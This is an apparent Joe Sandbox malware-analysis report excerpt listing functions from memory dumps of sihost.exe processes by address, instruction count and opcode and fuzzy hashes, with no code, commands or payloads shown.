Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 198fd5d2410f6f272e66cfdb256fdf56dd0c962be180e81d1ca2d40ea951f94b
Instruction ID: 5c7cebe8dc575b3beccefd4c6f797ae0af982e4118da38faffbf82de6f00210d
Opcode Fuzzy Hash: 198fd5d2410f6f272e66cfdb256fdf56dd0c962be180e81d1ca2d40ea951f94b
Instruction Fuzzy Hash: FD116D30A0A69E8FDB5AEB6888685B97FB0FF09300F0605BBD419C71A2DA756650CB41

Function 00007FFD9B89CD30 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0172f4f26e6af516a29077f3f0eff0e4491cfeaa9704b0ddba9a3c739a520f77
Instruction ID: f54493b518022be6c0966c8aa0181614965d9601e728e8722b96ee5fc953e351
Opcode Fuzzy Hash: 0172f4f26e6af516a29077f3f0eff0e4491cfeaa9704b0ddba9a3c739a520f77
Instruction Fuzzy Hash: AC119170E0990E8FEBA8EFA8C4696BE76E1FF18304F10457ED41DC21A9DE346250C751

Function 00007FFD9B890F25 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d786c4d938167866ca6f367fdd2f96c80470dd42cd8e439a1e76b45a61c4ff4a
Instruction ID: 8ee11cebd2ccdf1f69c4227ce588e77efcd5ca05385d73fa19dbe09a8e96438b
Opcode Fuzzy Hash: d786c4d938167866ca6f367fdd2f96c80470dd42cd8e439a1e76b45a61c4ff4a
Instruction Fuzzy Hash: 9C113031A1990D8BEF64EB54C864FED77B2EB58300F1142B5D40AA72A5DE34AA41CB80

Function 00007FFD9B89BC35 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a34e2299680a4de6dc8dc46080e395c67ddc1ef2ad6ef616256a023c662f3cd4
Instruction ID: 32b089d79e25f24f75c22d142722104e7dc1dd5f60633ffac9c2846af53f9041
Opcode Fuzzy Hash: a34e2299680a4de6dc8dc46080e395c67ddc1ef2ad6ef616256a023c662f3cd4
Instruction Fuzzy Hash: 30115E30A1A64E8FEB95EF64C4692BD7BE0FF19305F4104BED41DC61A1DE35A640C701

Function 00007FFD9B89C469 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6377f45911812d9135e9b712f704d2e5a757523ec8803ed3eca7cbd642f3652c
Instruction ID: 9122d7fcbb28d9ece92d72e8be48ab0fb0470c5478638b1c8c65abfa396858d4
Opcode Fuzzy Hash: 6377f45911812d9135e9b712f704d2e5a757523ec8803ed3eca7cbd642f3652c
Instruction Fuzzy Hash: 4911A030A0E68E8FDF59DF6488696B93FA1FF59310F5141BED409C61A6CA35A640CB40

Function 00007FFD9B89B847 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89ccd76c9e4370eda2efa2b00d34d172ec105d0d0c1022718de634248dc911ac
Instruction ID: d9625a55c11051f3e6ae280ec20d16d77885222fe5e51f6b11a5b2dcacdf5da6
Opcode Fuzzy Hash: 89ccd76c9e4370eda2efa2b00d34d172ec105d0d0c1022718de634248dc911ac
Instruction Fuzzy Hash: 40111930E1591E8ADB68EF94C8656E9BBB1EF5C300F0041B6C459E22A1DE346A81CF80

Function 00007FFD9B89C099 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4b798495d50092cab5d33cda4cbc3c57d14f6dcdb2de0f28666d6bd0ae68b88
Instruction ID: 65f801b659ef501ee042c5e01d418fe63f5412a6fc47a1a32e5789b5c4e8a1aa
Opcode Fuzzy Hash: c4b798495d50092cab5d33cda4cbc3c57d14f6dcdb2de0f28666d6bd0ae68b88
Instruction Fuzzy Hash: D7118230A0968E8FEB55EF64C4696BD7FB0FF19301F4105BFD419D61A2DA399644CB00

Function 00007FFD9B892EF1 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 669f03396604be9f9f0e1e1e1c094c94934cc663770aadef4e49698869e274dd
Instruction ID: ce94f91e3d6b6b2f8fc0c159e95fda93e897ad487d099162c140c113d219ab55
Opcode Fuzzy Hash: 669f03396604be9f9f0e1e1e1c094c94934cc663770aadef4e49698869e274dd
Instruction Fuzzy Hash: 9B017170A1A64E4FEB65EFA488695B97FE0EF59300F0605B6D40CC60A6EA34E5548701

Function 00007FFD9B8905D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b12f80380e5f8d136661b6f7c613423bfe546d841a85ddfb2497cd6b387fd3ba
Instruction ID: e278f14e4330d8deaa5ba262f2dea36175bf043a5920634af44543d8749f3ea2
Opcode Fuzzy Hash: b12f80380e5f8d136661b6f7c613423bfe546d841a85ddfb2497cd6b387fd3ba
Instruction Fuzzy Hash: 41018C30A0950E9FDFA8EF64C4656BA7BA1FF5C304F51047EE41EC21E4CA35A650CB80

Function 00007FFD9B891D01 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25e7546c0a282006bd96265598920a682bfec39ab78bebf6d6c1eea02932f254
Instruction ID: 850e39d597aa5b070268788143918b2df1f7627e4801f5fc1172ce573a534412
Opcode Fuzzy Hash: 25e7546c0a282006bd96265598920a682bfec39ab78bebf6d6c1eea02932f254
Instruction Fuzzy Hash: 4201D630A0E68E9FEFA9EF6488655BA7FA1FF59300F51017AD408C61E2CB35D650C740

Function 00007FFD9B8928CD Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b67c62826d47404841419b28e0f49f9816908676adfac4d28c55c38f884c210
Instruction ID: 8feba1eb10c4ce842a8228db046318fc2481b0ffcd2b8284f02e00d263500d4b
Opcode Fuzzy Hash: 0b67c62826d47404841419b28e0f49f9816908676adfac4d28c55c38f884c210
Instruction Fuzzy Hash: BC01B130A0A64E4FEB65EFA48898AB97FE0FF19300F0645B6D408C61A6DA34E6848741

Function 00007FFD9B892F69 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 449d11ee7ada6a1e83da893c50cfd7b4ddab1f805ccc24fbd2c8ca2c6f4199af
Instruction ID: ea5e4b94c9d7e9c5854cacc6fdd353a93830d38a710c5c79aaf778fb335210aa
Opcode Fuzzy Hash: 449d11ee7ada6a1e83da893c50cfd7b4ddab1f805ccc24fbd2c8ca2c6f4199af
Instruction Fuzzy Hash: B2018471A0E64E4FEB76EBB488695A97FE0EF5A300F0604F6D408C70B6DA28A5448701

Function 00007FFD9B89A9F9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff30db8d1fd1d2d262ec38950157b756fde70d371532abdc0cf49f572c294963
Instruction ID: f00405c621c4bb7d6d214d93c1dd0a3b411716546216199fff2986f46ace82fe
Opcode Fuzzy Hash: ff30db8d1fd1d2d262ec38950157b756fde70d371532abdc0cf49f572c294963
Instruction Fuzzy Hash: 7101A734A5E68D5FEB66EB7489695A97FE0EF1E300F0608F6D408C70B6DA38A544C701

Function 00007FFD9B890610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87d2d48518938886234f9c3ceb8c6ef6aa707935ee2ecfec7ab8c3f639eecdbf
Instruction ID: c1dcc0320783cddd7d4e05aad9e7969c30218d26ea48f81b193c8b1301b04321
Opcode Fuzzy Hash: 87d2d48518938886234f9c3ceb8c6ef6aa707935ee2ecfec7ab8c3f639eecdbf
Instruction Fuzzy Hash: 0C016D30A1990E8AEF6DEFA4C4696B977A0FF18305F5108BED41ED61E5DE35E650C600

Function 00007FFD9B890608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 403ccc9d39eefc169f801841ef553c7d230d8fa66590b985459c481459b8c703
Instruction ID: 1ae9ee407bd043e10278839b06f3c5933a2dd7f9445b436dbd40b9c7f36cca55
Opcode Fuzzy Hash: 403ccc9d39eefc169f801841ef553c7d230d8fa66590b985459c481459b8c703
Instruction Fuzzy Hash: 84016D30A5590E8EEB5DEFA4C4686B976A0FF1C305F11087EE41ED21E5DE35A250C640

Function 00007FFD9B891220 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1885e69948957051f425ead9cd1f73eeb27cd70e4dda0475cdf6e4e662ef48d
Instruction ID: 59fee5760c420c125d059a38fb768dcdf49bdffb2d4fe26bf81b2ff3f9347987
Opcode Fuzzy Hash: f1885e69948957051f425ead9cd1f73eeb27cd70e4dda0475cdf6e4e662ef48d
Instruction Fuzzy Hash: 55F0F430A0E64F5AEFA5FBE484682FA7BE0FF19205F01043EE45EC10E1DE241600C200

Function 00007FFD9B8905D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efed34bd7e81246465c0c997e721a0a858ee57cffa0058ebe3d4fd935b12b8c2
Instruction ID: 2b2749a088d02284b19974f3880f6e007f8295ea4e6e3545c298c023a1d1ed83
Opcode Fuzzy Hash: efed34bd7e81246465c0c997e721a0a858ee57cffa0058ebe3d4fd935b12b8c2
Instruction Fuzzy Hash: 56F0C230A0E64E9FEFA8EF6494656FA7BA0EF09308F41047AE40DC21E1CA35A650C780

Function 00007FFD9B89BD65 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f0cb7b0d3da6b721c24765d7d9602198fb4ca19a596dace0ad0f0da1d6c3d38
Instruction ID: 7e328e8fc318b6c75fb7246628f4b915f24ac746e3d0fb735d78d2970ab8753c
Opcode Fuzzy Hash: 1f0cb7b0d3da6b721c24765d7d9602198fb4ca19a596dace0ad0f0da1d6c3d38
Instruction Fuzzy Hash: EF019A74E0A10EDBDF18DF84E9909FDBBB5FF58711F210129E406A76A1DB746A40DB40

Function 00007FFD9B8927E9 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ecd3a34da56a00d8d2a5bfcecfbdfb38f126a76ce979cb69a8ee345aa457900
Instruction ID: 2bbf31bcb0b9dc3d1671f5d9e4e7e916e00444d83a49e6e974b57f480a4526da
Opcode Fuzzy Hash: 8ecd3a34da56a00d8d2a5bfcecfbdfb38f126a76ce979cb69a8ee345aa457900
Instruction Fuzzy Hash: FAF0AF3090E78E8FDB6E9FA088241A93FA0BF4A201F0605BBD409C61E3DA289558C741

Function 00007FFD9B89285D Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28ea838323f1d6e0557298c73f29a6f718d582883324d822273127bc9729dc8b
Instruction ID: 652e7a0ccfb1cddd91b61a2ceae9cc1c317ba65c02ab87028cd03d9cdd2ecfbf
Opcode Fuzzy Hash: 28ea838323f1d6e0557298c73f29a6f718d582883324d822273127bc9729dc8b
Instruction Fuzzy Hash: 5EF0B434A0E64E8FEF6D9FA888651F93BA0FF59300F4145BEE419C51E6DB38D5548701

Function 00007FFD9B89BDB7 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d14c68c6ac486703bea40b4d19bbe023f32ed64f68c717eb0eeb62bf48c65e26
Instruction ID: 874ad7112739f0a52c927fbf60898de17bbd605a4ab56a6704afd4cc671b71a7
Opcode Fuzzy Hash: d14c68c6ac486703bea40b4d19bbe023f32ed64f68c717eb0eeb62bf48c65e26
Instruction Fuzzy Hash: F5F0C974E0510EEFDF18DF84E8909EDBBB1FF58711F210529E406A76A0DB746940CB40

Function 00007FFD9B89B7F3 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1815816325.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b890000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de09df1ccfdbe39fa6d7407b7aec268b1fdc6542a3c8e0d3f70bd9e0b9664f3f
Instruction ID: bc354a0052d09421f09089aa88919807181b26244eae1887d7143b2aa94447e7
Opcode Fuzzy Hash: de09df1ccfdbe39fa6d7407b7aec268b1fdc6542a3c8e0d3f70bd9e0b9664f3f
Instruction Fuzzy Hash: 20D09E20A1945D4AEB68EB54C450BA9B664FF18340F1086E1800EE2156DA346A818B80

Analysis Process: sihost.exePID: 7024, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9B8B1A1D Relevance: 3.8, Strings: 3, Instructions: 27COMMON

Download Yara Rule

Strings

/, xrefs: 00007FFD9B8B178D
!, xrefs: 00007FFD9B8B14C1
#, xrefs: 00007FFD9B8B1A27

Memory Dump Source

Source File: 00000017.00000002.1825845630.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8b1000_sihost.jbxd

Similarity

API ID:
String ID: !$#$/
API String ID: 0-1977740678
Opcode ID: 2dd892a18e20ab91bd1a0b5d096d57e3ca8f949969e833992e992f2b1276021e
Instruction ID: a7743cbf47bfd0a66933e0f16429ab0d40cbf30e520f03c055ed7bf8165a4b7c
Opcode Fuzzy Hash: 2dd892a18e20ab91bd1a0b5d096d57e3ca8f949969e833992e992f2b1276021e
Instruction Fuzzy Hash: FDF03035A1821DCBEB28EFD1C8A4AED77B1EB54300F11013AC0099B2E9CA785644CF44

Function 00007FFD9B8B14AA Relevance: 2.5, Strings: 2, Instructions: 22COMMON

Download Yara Rule

Strings

/, xrefs: 00007FFD9B8B178D
!, xrefs: 00007FFD9B8B14C1

Memory Dump Source

Source File: 00000017.00000002.1825845630.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8b1000_sihost.jbxd

Similarity

API ID:
String ID: !$/
API String ID: 0-2633443642
Opcode ID: 69af58cc88944539680c8fb1e6e52516ec95cf24a7dde68b6ce0d45d45ceefef
Instruction ID: 8c4dc08292313cb6c5ba78130b305303e200cedfcad046165bd481cb4dd7f23c
Opcode Fuzzy Hash: 69af58cc88944539680c8fb1e6e52516ec95cf24a7dde68b6ce0d45d45ceefef
Instruction Fuzzy Hash: AFE0ED35A1861DCFEB28EF91C8A09ED77B1EB55310F11026AC10AEB2A9DA786644CB44

Function 00007FFD9B8AC7DD Relevance: 1.5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

^, xrefs: 00007FFD9B8AC839

Memory Dump Source

Source File: 00000017.00000002.1825845630.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8aa000_sihost.jbxd

Similarity

API ID:
String ID: ^
API String ID: 0-1590793086
Opcode ID: 14a8b39ade36bfc9da06ab3153d98699f9ccdb503b1087412aff4021552b8156
Instruction ID: a31a4dc2dde933a9de1dd80f5715c2aecbec9e54ce70cb0f1d98abde7ca674f6
Opcode Fuzzy Hash: 14a8b39ade36bfc9da06ab3153d98699f9ccdb503b1087412aff4021552b8156
Instruction Fuzzy Hash: 1051692370C52A86E71A3BACBC694F97784EF45375F090177D148CA0E7EA2821878AE1

Function 00007FFD9B8AFDA7 Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

%, xrefs: 00007FFD9B8AFDC5

Memory Dump Source

Source File: 00000017.00000002.1825845630.00007FFD9B8AF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8af000_sihost.jbxd

Similarity

API ID:
String ID: %
API String ID: 0-2567322570
Opcode ID: 9892e803913b2365489fd35bd88cea81f59caf09e95c147d09ecb01dad37b099
Instruction ID: d5b2c1ced5b0c6d405292cadbbcac01fe42dcc72eeed94ee6595f1eb728ab0de
Opcode Fuzzy Hash: 9892e803913b2365489fd35bd88cea81f59caf09e95c147d09ecb01dad37b099
Instruction Fuzzy Hash: 7BD092B0A48A2E8FEBB5EF58C8587A9B6B1BB18714F4000A9904DD2291CB341A84CF45

Function 00007FFD9B8B3335 Relevance: .6, Instructions: 550COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1825845630.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8b1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42b03d0429ba95796fb1b1ab59ea21cc873944ab7e9dda00ddc215b6e1171448
Instruction ID: f8048a9d16243105e9b8ab04c1bbe326fb3c70a393d492ee163f74acfe4353a8
Opcode Fuzzy Hash: 42b03d0429ba95796fb1b1ab59ea21cc873944ab7e9dda00ddc215b6e1171448
Instruction Fuzzy Hash: 0451F862A0F7E54FE72797B85C750A93FB0EF57210B0901FBD098CB0E7E918A9458782

Function 00007FFD9B8B33F8 Relevance: .5, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1825845630.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8b1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 202a301c0a710af3f6c64baa7459b01b13e1e775aa4a27059436ea148b90d981
Instruction ID: 1f5ef83f68cc295833d0b491edb7318e2e2c4a37dd60160f91d80e1d578b02b4
Opcode Fuzzy Hash: 202a301c0a710af3f6c64baa7459b01b13e1e775aa4a27059436ea148b90d981
Instruction Fuzzy Hash: 8211B161A0F7DA8EE75397B84C351A93FB0EF07210F0905FBD498CB0E3E9186A448792

Function 00007FFD9B8AD959 Relevance: .4, Instructions: 424COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1825845630.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8aa000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f47d6ad24d9d48eabf7a056ce90fc0521167bfc1c05f465acae9ad05df790d2
Instruction ID: dabfb6b2c94a7be9fb1739963fd5b0b373c8a826747fdaa42cdc97b27ff54fe9
Opcode Fuzzy Hash: 8f47d6ad24d9d48eabf7a056ce90fc0521167bfc1c05f465acae9ad05df790d2
Instruction Fuzzy Hash: 28E15A71E19A5D8FEBA8DB98D864BB8B7B1FF58300F4401BAD00DD32E2DA346941CB51

Function 00007FFD9B8A31E5 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1825845630.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8a0000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f43b8c94b9a6c51a8702d1c7e2edd0455b09fe386574c5e190507247e99a9d94
Instruction ID: 538cd96296fa5d7bd6e2a35d11b73297f362256554a5e3f478ac58e95fd40c55
Opcode Fuzzy Hash: f43b8c94b9a6c51a8702d1c7e2edd0455b09fe386574c5e190507247e99a9d94
Instruction Fuzzy Hash: 3F510B70E0961E8FEB64EF94D4656EDBBF1EF58301F51017AD009E72A2DE386A44CB50

Function 00007FFD9B8B7059 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1825845630.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8b1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0981a5a52e87139b0c2acbf0ebd037d6613df4fee72d6406cba496b0350f355
Instruction ID: 346fba32db2803dd600dcfbfd5ae15fc8f34eed6a1385a65950a9391dc5866e4
Opcode Fuzzy Hash: c0981a5a52e87139b0c2acbf0ebd037d6613df4fee72d6406cba496b0350f355
Instruction Fuzzy Hash: DE51BE34E0A61E8FEB64DFA4C8616FDB7B1EF48310F11413AD409D72A6CF386A458B91

Function 00007FFD9B8B3AFB Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1825845630.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8b1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df943eec6f5626e2891b06c6e1a18071160a34bc3db6384613503e72e3d685ca
Instruction ID: 176a7681e9235d9326e545befaae0eeeb79508e34ea6728033417ab47ac78e26
Opcode Fuzzy Hash: df943eec6f5626e2891b06c6e1a18071160a34bc3db6384613503e72e3d685ca
Instruction Fuzzy Hash: F7414B327096695EE716BBBCFC664F57BA0EF41371B04057BD008CA0B6EA21A545CBD0

Function 00007FFD9B8A3615 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1825845630.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8a0000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 823de1bb0d382ce0b37bd6d8ffb6fd8980e3320be486f2f95b8caa4e69d33888
Instruction ID: 07b101aeaecbdc652947fb11a81bd0d9545ff20bcb291177caaaeb70f9e74b30
Opcode Fuzzy Hash: 823de1bb0d382ce0b37bd6d8ffb6fd8980e3320be486f2f95b8caa4e69d33888
Instruction Fuzzy Hash: F3519E31A09A8E8FEB98DBA8D865BBD7BE0FF59300F4101BAD019D72E5DF2469018751

Function 00007FFD9B8B27ED Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1825845630.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8b1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fe891f94005f7b8ece9b4e5d5b18eeac5b0b82c0c41d6b68e200c66c67885cd
Instruction ID: 3570643c257a32293bbc46c5b7eb9b5a9427269d72780694e05617f35437e23c
Opcode Fuzzy Hash: 0fe891f94005f7b8ece9b4e5d5b18eeac5b0b82c0c41d6b68e200c66c67885cd
Instruction Fuzzy Hash: BC413A30E1965E8FDB58EFE8D865AEDB7B1FF48300F01017AE019E3296DA346941CB91

Function 00007FFD9B8ABCB9 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1825845630.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8aa000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0638d9e978cd490492b345962e1ae128781c75d0f303178d7bb4b775990d78d1
Instruction ID: 214cbaf20a000361f196086388b2e24d86ca902cd973c9d8b70b9f88d8769cc9
Opcode Fuzzy Hash: 0638d9e978cd490492b345962e1ae128781c75d0f303178d7bb4b775990d78d1
Instruction Fuzzy Hash: 6F412870E0A65E9FEB64DFA4D8646EDB7B1FF18300F01017AE409E72A1DB78A944CB50

Function 00007FFD9B8AAE3D Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

